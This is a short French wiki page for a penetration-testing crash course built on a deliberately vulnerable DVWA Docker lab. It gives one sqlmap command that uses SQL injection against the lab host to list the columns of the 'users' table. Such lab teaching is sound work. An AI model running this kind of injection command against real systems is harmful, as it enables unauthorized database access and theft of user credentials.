Pentest101

From Tmplab
Revision as of 22:32, 24 September 2020 by Alban (talk | contribs) (Created page with " == Crash course == <code> * Documentation docker : https://git.interhacker.space/alban/docker-vulnerable-dvwa * docker run --rm -it -p 80:80 albancrommer/dvwa * browser http:...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

Crash course

On obtient la liste des bases de données à partir d'une appli faillible en injection SQL... Que faire ensuite ?

sqlmap -u "http://dvwa.lab.local/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=$SESSIONCOOKIE;security=low" -D dvwa -T users --columns